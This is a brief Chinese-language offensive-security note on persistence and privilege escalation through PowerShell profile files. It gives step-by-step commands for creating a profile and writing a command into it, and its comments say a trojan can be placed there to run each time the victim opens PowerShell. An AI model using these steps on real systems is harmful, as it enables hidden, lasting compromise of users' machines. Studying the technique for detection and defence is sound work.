持久化-Powershell配置文件持久性
概述
可以使用Powershell配置文件进行持久性和/或特权升级。
执行
获取可以滥用的powershell配置文件,这取决于你拥有的权限。
$PROFILE | select *
让我们将代码添加到$ profile变量(扩展为当前用户的配置文件)中,该变量将在受感染的用户下次启动Powershell控制台时执行:
PS:
1、如果无法执行ps1脚本,需要用管理员执行Set-ExecutionPolicy Remotesigned
2、echo $profile
3、Test-Path $profile //如果显示NO需要创建一个,我用初始系统测试默认是没有这个配置文件的
4、New-Item -Path $profile -Type File –Force //创建配置文件
5、echo "whoami > c: empwhoami.txt" > $PROFILE //这里可以把木马写进配置文件中
6、cat $PROFILE //查看是否写成功,成功会文件内容会显示为你木马路径
7、重启启动一个powershell,木马上线成功